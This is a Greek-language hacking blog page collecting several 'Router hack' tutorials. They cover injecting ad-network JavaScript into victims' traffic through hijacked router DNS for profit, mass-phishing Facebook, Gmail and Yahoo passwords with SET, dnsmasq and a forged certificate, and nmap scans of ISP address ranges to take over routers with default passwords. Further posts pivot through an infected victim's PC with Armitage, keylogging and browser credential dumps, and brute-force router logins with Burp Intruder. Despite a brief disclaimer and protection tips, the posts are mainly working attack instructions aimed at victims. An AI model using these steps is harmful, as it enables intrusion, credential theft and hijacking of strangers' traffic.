ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι


Εμφάνιση αναρτήσεων με ετικέτα Router hack. Εμφάνιση όλων των αναρτήσεων
Εμφάνιση αναρτήσεων με ετικέτα Router hack. Εμφάνιση όλων των αναρτήσεων

Δευτέρα 19 Ιανουαρίου 2015

Πως βγαζουμε λεφτα απο το διαδικτυο(Blackhat Technique)



Τι θα χρειαστειτε;

1.Kali linux

Σε προηγουμενους μου οδηγους μαθαμε πως να εισβαλουμε σε αγνωστα router
,πως να αλλαζουμε τον dns στο router του θυματος και πως να κανουμε dns hijacking αποσκοπωντας σε εισβολη στο συστημα τους και κλεψιμο κωδικων

Σε αυτο τον οδηγο θα σας μαθω πως να βγαζετε λεφτα απο αυτο

Παταμε εδω
Φτιαχνουμε ενα λογαριασμο και πηγαινουμε στην καρτελα Tools

κατω αριστερα επιλεγουμε popup ads  και αντιγραφουμε τον κωδικα στην κατω εικονα σε ενα αρχειο κειμενου

τωρα γραφουμε σε ενα τερματικο
  • curl ifconfig.me
και σημειωνουμε την εξωτερικη μας ip στο αρχειο κειμενου


γραφουμε
  • ifconfig
σημειωνουμε την εσωτερικη μας ip  στο αρχειο κειμενου


 τωρα πηγαινουμε στο router γραφωντας στην url του browser μας 192.168.1.1 η 192.168.2.1 η 192.168.1.254 (αναλογα ποια ειναι η ip του router σας)
κανουμε login πχ admin admin η οτι κωδικους εχει το δικο σας router

πηγαινουμε στις ρυθμισεις  επιλεγουμε dmz και βαζουμε την εσωτερικη μας ip


*Μπορειτε να προωθησετε τις θυρες 53,80,443 ενναλακτικα*

ανοιγουμε το burpsuite  απο το menu η γραφουμε σε ενα τερματικο burpsuite

κοιταξτε  προηγουμενο οδηγο οι ρυθμισεις πρεπει να ειναι ετσι

στην καρτελα proxy-options

Proxy Listeners

κατω Match and Replace επιλεγουμε Add
γραφουμε τα εξεις στοιχεια (στο replace κανουμε αντιγραφη το javascript απο το adfly)και επιλεγουμε Enable


κατω στο SSL Pass Through επιλεγουμε Add και ok


στην καρτελα Proxy - Intercept επιλεγουμε Intercept off


τωρα ανοιγουμε ενα τερματικο και γραφουμε

  • dnschef -i εσωτερικηip --fakeip=εξωτερικηip --truedomains=*google.gr

πχ στη κατω εικονα ειναι οταν εχουμε αλλαξει στο router του θυματος το dns και τρεχουμε το dnschef


*αλλαζουμε το dns στο θυμα με την εξωτερικη σας ip*
μπορειτε να το αλλαξετε η στο router του ωστε ολες οι συσκευες να περνανε απο εσας
η αν εχετε απομακρυσμενη προσβαση στον υπολογιστη του κατευθειαν (δειτε παλιοτερους οδηγους)
!Προσοχη μην ξεχασετε να εχετε βαλει και δευτερο dns στο θυμα πχ 8.8.8.8! 
αν θελετε να το δοκιμασετε στο δικο σας δικτυο τοτε αλλαξτε το dns σε μια συσκευη πχ κινητο,υπολογιστη,tablet κτλ (αλλα εφοσον ειναι στο τοπικο δικτυο σας δεν κανουμε καποια προωθησει θυρας και οι ρυθμισεις του dnschef ειναι:

dnschef -i εσωτερικηip --fakeip=εσωτερικηip --truedomains=*google.gr

τωρα οταν το θυμα κανει σερφαρισμα στο διαδικτυο σε σελιδες http θα του εμφανιζονται διαφορες διαφημισεις και θα περνετε λεφτα απο το adfly

πχ απο 3 router και με μια συνηθισμενη κινηση του δικτυου δλδ πανω απο 2-3ς συσκευες στο καθενα θα εχετε αυτα τα αποτελεσματα

Τετάρτη 15 Οκτωβρίου 2014

Πως κλεβουμε μαζικα κωδικους Facebook,Yahoo,Gmail με την μεθοδο dns hijacking (Expert Phising)



Τι θα χρειαστειτε;

1.Κali Λinux
2.Απομακρυσμενη προσβαση σε καποιο router


Οταν λεμε Dns hijacking ειναι οταν αλλαζουμε στο router η στη συσκευη του θυματος με ενα δικο μας dns server
δλδ αν ο χρηστης ψαχνει για www.facebook.com που ειναι ενα domain name
ο dns του θα του πει οτι το www.facebook.com βρισκετε στην ip 31.13.86.145
ενω αν αλλαξουμε στο router του θυματος και βαλουμε τον δικο μας dns server τοτε μπορουμε να βαλουμε οτι το www.facebook.com ειναι στην ταδε ip η οποια αυτη η ip ειναι η σελιδα phising που εχουμε φτιαξει

τωρα για να ξεκινησουμε αυτη την επιθεση
πρεπει να φτιαξουμε τον dns server μας και να φτιαξουμε και την σελιδα phising

Πριν αρχισουμε γραφουμε σε ενα τερματικο ifconfig


βλεπουμε οτι η εσωτερικη μας ip ειναι 192.168.1.4 σε εσας μπορει να ειναι κατι αλλο πχ 192.168.1.χ

τωρα ανοιγουμε το browser μας και γραφουμε 192.168.1.1 η 192.168.2.1 η 192.168.1.254 ωστε να ενωθουμε με το router μας
πηγαινουμε και επιλεγουμε firewall dmz και βαζουμε την εσωτερικη μας ip ,επιλεγουμε enable

αριστερα σημειωνουμε την public ip (εξωτερικη ip)

κλεινουμε το browser

τωρα σε ενα τερματικο γραφουμε

setoolkit

 επιλεγουμε 1
 επιλεγουμε 2
 επιλεγουμε 3
 επιλεγουμε 2
 γραφουμε την εξωτερικη μας ip

γραφουμε την ψευτικη σελιδα που θελουμε να φτιαξουμε πχ https://www,facebook.com/

 και παταμε enter


παταμε ctrl+c ωστε να κλεισει το SET
γραφουμε σε ενα τερματικο nano dns.conf μεσα γραφουμε

address=/facebook.com/εξωτερικηip


 παταμε ctr+x επιλεγουμε enter και αποθηκευουμε

τωρα ειμαστε ετοιμοι να ξεκινησουμε τον dns server μας ομως πριν το κανουμε αυτο επειδη το facebook ειναι https και σε ορισμενα browsers δεν θα εμφανιζει καν την σελιδα οποτε αναγκαστικα πρεπει να δημιουργησουμε ενα ssl πιστοποιητικο για την σελιδα phising που εχουμε φτιαξει με το SET
Το ssl certificate ειναι ενα πιστοποιητικο το οποιο κρυπτογραφει και φροντιζει την ασφαλη μεταφορα δεδομενων απο την σελιδα προς εσας  και φροντιζει να ταυτοποιει και να πιστοποιει την σελιδα 

*Προαιρετικο* οποτε γραφουμε σε ενα τερματικο

a2enmod ssl

και για να φτιαξουμε το πιστοποιητικο γραφουμε στο τερματικο
 
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/private/facebook.key -out /etc/ssl/certs/facebook.pem

και βαζουμε τα εξεις στοιχεια ωστε να φενεται αληθινο *δειτε μετα στο τελος*


 τωρα γραφουμε nano /etc/apache2/sites-available/default-ssl

πηγαινουμε λιγο κατω που λεει ssl engine το αλλαζουμε σε on και προσθετουμε τις γραμμες αυτες


παταμε ctrl+x  μετα y και enter για να αποθηκευσουμε

*Τελος προαιρετικου*
μετα γραφουμε στο τερματικο

service apache2 restart


τωρα ειμαστε ετοιμοι να τρεξουμε τον dns server μας με την εντολη

dnsmasq --no-daemon --log-queries -C dns.conf

τωρα εφοσον τα εχουμε ολα μια χαρα μας μενει να βρουμε τα θυματα

 σε προηγουμενο μου οδηγο σας εδειξα πως ανιχνευετε και εισβαλετε σε αγνωστα router οποτε ας πουμε οτι εχετε προσβαση στο ρουτερ καποιου
 τοτε θα αλλαξετε το dns server του με την δικια σας εξωτερικη ip δλδ


τωρα εφοσον αλλαξαμε τον dns  server στο αγνωστο router θα δουμε στο τερματικο που τρεχει ο dns server μας ολα τα domain που αναζητα καποιος απο το συγκκριμενο router και συγκεκριμενα θα δουμε την ανακατευθυνση του facebook πχ ο χρηστης με ip 193.xx.xx.xx ψαχνει το www.facebook.com
και ο dns server μας απανταει οτι ειναι στην ip 178.xx.xx.xx δλδ στην εξωτερικη μου ip που εχω την σελιδα phising


και οταν ο χρηστης η οι χρηστες βαλουνε τον κωδικο τους τοτε εσεις θα τρεξετε σε ενα τερματικο

cat /var/www/harvester*.txt
η tail -f  /var/www/harvester*.txt *για να μην τρεχετε συνεχεια την εντολη cat*

και θα σας τους εμφανισει


Αυτη η μεθοδος εφαρμοζετε καλυτερα σε δημοσια δικτυα πχ καφετεριες
Προσοχη σε μερικα browsers βγαζει οτι το πιστοποιητικο δεν ειναι εγκυρο γιατι πολυ απλα για την ψευτικη σελιδα facebook παρεχουμε ενα αλλο πιστοποιητικο και οχι το γνησιο
για να παρακαμψουμε αυτο πρεπει να κανουμε εγκατασταση το πιστοποιητικο στο θυμα μας πραγμα το οποιο ειναι αδυνατο εκτος και αν εχουμε απομακρυσμενη προσβαση η φυσικη
Ετσι οπως ειναι ο οδηγος εχει αποτελεσματα περιπου 85% βεβαια παρατηρησα οτι ειναι καλυτερο να μην βαζετε sll engine on και να εχετε την ψευτικη ιστοσελιδα σας χωρις ssl


Πως θα προστατευτειτε;

Απλα μην αφηνετε τους εργοστασιακους κωδικους στο ρουτερ σας γιατι ακομα και ενας κακοβουλος χρηστης να μην εχει απομακρυσμενη συνδεση με το ρουτερ σας μπορει να εχει απο την τοπικη συνδεση συνηθως αυτο γινετε σε καποια καφετερια η ακομα να εχει καποιον μολυσμενο με ιο χρηστη που ειναι στο δικτυο σας και να συνδεθει μεσω αυτου (δειτε προηγουμενους οδηγους)

Σάββατο 11 Οκτωβρίου 2014

Πως ανιχνευουμε και εισβαλουμε σε αγνωστα router (nmap)




Τι θα χρειαστειτε;

1.Kali linux

Προσοχη αυτος οδηγος ειναι μονο για εκπαιδευτικους λογους ,εφαρμοζoντας αυτο τον οδηγο σε μην εξουσιοδοτημενα router ειναι με δικια σας ευθυνη
καθως ειναι παρανομος

Παταμε εδω για να δουμε το ευρος ip των παροχων internet ανα χωρα

πχ εγω επελεξα Ελλαδα


και βλεπουμε τους παροχους και απο ποιο ευρος ip διευθυνσεων αρχιζουνε και τελειωνουν


 πχ 193.92.0.0 για forthnet

τωρα γραφουμε σε ενα τερματικο 

nmap -sS -sV -vv -n -Pn -T5  193.92.0.0/16 -p80 -oG - | grep 'open'

τωρα το nmap θα αρχισει να σκαναρει απο 193.92.0.0 - 193.92.255.255 

τωρα βαζουμε στην url του browser μας οποια ip θελουμε θα μας ζητησει κωδικο μπορειτε να κοιταξετε εδω για τους εργοστασιακους κωδικους


και ενωνομαστε με το router με τους εργοστασιακους κωδικους
η κοιταξτε παλιοτερους οδηγους μου πως να σπασετε τον κωδικο σε ενα router με (hydra,burpsuite)
*μπορειτε να ενωθειτε και μεσω tor και proxychains ωστε να ειστε ανωνυμοι δειτε προηγουμενο οδηγο*


και


τωρα εφοσον εχουμε παρει προσβαση στο ρουτερ τωρα μπορουμε να παρουμε τον κωδικο wifi και να τον προσθεσουμε στην λιστα μας,να κανουμε dns hijacking,να κλεισουμε το firewall,να προωθησουμε ολη την κινηση σε εμας κτλ 


Πως θα προστατευτειτε;

Απλα αλλαξτε τον κωδικο συνδεσης στο router σας και αφαιρεστε την επιλογη  απομακρυσμενης προσβασης

Τρίτη 30 Σεπτεμβρίου 2014

Πως εισβαλουμε στο router ενος μολυσμενου χρηστη(proxychains+Armitage)





Τι θα χρεαστειτε;

1.Kali linux
2.Εναν μολυσμενο χρηστη


*Πως θα μολυνετε εναν χρηστη μπορειτε να δειτε σε παλιοτερους οδηγους μου*

Οταν εχουμε συνεδρια με το θυμα μας τοτε γραφουμε αριστερα autoroute


βαζουμε στο subnet 192.168.1.0 και επιλεγουμε Launch


μετα αριστερα γραφουμε socks επιλεγουμε socks4 kai βαζουμε τις ιδιες ρυθμισεις οπως στην εικονα κατω


τωρα ανοιγουμε ενα τερματικο και γραφουνε

nano /etc/proxychains.conf

και προσθετουμε αυτη την γραμμη socks4 127.0.0.1 1080


παταμε ctrl+x επιλεγουμε y και παταμε enter

τωρα γραφουμε proxychains iceweasel 192.168.1.1
*πρεπει να μην εχετε ανοικτο το iceweasel και να βαλετε σωστα την ip του ρουτερ πχ 192.168.2.1 η 192.168.1.254 κτλ



βαζουμε τα κριτηρια συνδεσης πχ admin/admin και συνδεομαστε

αν δεν μπορειτε να βρειτε ποιος ειναι ο κωδικος η κανετε επιθεση με hydra μεσω του proxychains δλδ proxychains hydra -u admin -P pass.txt https://192.168.1.1 δειτε παλιοτερους οδηγους
η επιλεγετε το keylogger_record ωστε να καταγραφει τι πληκτρολογει το θυμα
και σε ενα shell γραφετε explorer "http://192.168.1.1" ωστε να του εμφανιστει η σελιδα και να βαλει τα κριτηρια συνδεσης του


εδω στην πανω εικονα βλεπετε την επιφανεια εργασειας του θυματος
και πως του ανοιξε η σελιδα του ρουτερ του

επισης μπορειτε να παρετε τα κριτηρια συνδεσης του ρουτερ αν τρεξετε την επιλογη enum_chrome η enum_firefox αναλογα με το browser του
και  αν εχει αποθηκευσει τα κριτηρια συνδεσης στο browser του θα σας τα εμφανισει.



Κυριακή 23 Μαρτίου 2014

Πως σπαμε τον κωδικο του router (με Burpsuite)






Tι θα χρεαστειτε;

1.Kali Linux


Ανοιγουμε το burpsuite (Θα το βρειτε Εφαρμογες-Kali linux-Top 10 security Tools-burpsuite)
Για να ρυθμισουμε Burp Suite πρεπει να ανοιξουμε τον περιηγητη μας (browser)
και να ρυθμισουμε το proxy ετσι ωστε να περναει το request μας πρωτα απο το Burp Suite και μετα στον περιηγητη δειτε εικονα κατω τα βηματα των ρυθμισεων


τωρα ανοιγουμε το burpsuit πηγαινουμε στην σελιδα login του router και βαζουμε τα κριτηρια συνδεσης δειτε εικονα κατω
 

οταν πατησετε login θα δειτε οτι το αιτημα σας δεν προωθειτε και η καρτελα proxy - intercept του burp suit εχει γινει πορτοκαλι δειτε εικονα κατω


οπως βλεπετε με το που πατησαμε login το burb suite επιασε το αιτημα που στειλαμε μαζι με τα κριτηρια συνδεσης που γραψαμε ,τωρα πρεπει να πατησουμε forward για να προωθηθει το αιτημα μας
και οπως βλεπετε στον περιηγητη μας δεν ητανε σωστα τα κριτηρια συνδεσης μας 



Τωρα πηγαινουμε στο burp suite και επιλεγουμε το αιτημα που στειλαμε τα λαθος κριτηρια συνδεσης παταμε δεξι κλικ και επιλεγουμε sent to intruder ,δειτε εικονα κατω


οποτε τωρα πηγαινουμε στην καρτελα του intruder – positions για να ρυθμισουμε την επιθεση μας



oπως βλεπετε στην πανω εικονα αυτοματα το burpsuite εχει βαλει τις παραμετρους που μπορουμε να επιτεθουμε


 


τωρα επιλεγουμε στο attack type Cluster bomb και πηγαινουμε στη καρτελα payloads ,επιλεγουμε στο payload set 1 ,payload type επιλεγουμε Simple list ,πηγαινουμε στο ποιο κατω στο payload options και στο load μπορουμε να προσθεσουμε το λεξικο μας η στο add να γραψουμε ενα ονομα χρηστη πχ admin και να πατησουμε enter προσθετωντας το,το ιδιο κανουμε και για το payload 2 που θα ειναι για τον κωδικο δλδ με λιγα λογια εχουμε βαλει στην πρωτη παραμετρο 1 username=§xrhsths§ να δοκιμαζει ονοματα χρηστη και στην παραμετρο 2 psd=§kodikos§ να δοκιμαζει κωδικους δειτε εικονα κατω 

 
 
μπορειτε να επιλεξετε επισης για Payload type :Dates ετσι ωστε να δοκιμασει ημερομηνιες για κωδικο δειτε εικονα κατω


τωρα πανω πανω στο κεντρικο menu επιλεγουμε intruder και start attack δειτε εικονα κατω
 

στην εικονα πανω το status σε ολα τα κριτηρια ειναι το ιδιο μονο στο
request 66 βλεπουμε διαφορετικο μεγεθος lenght 296

 


 οποτε ειναι το ονομα χρηστη admin και κωδικος sail0r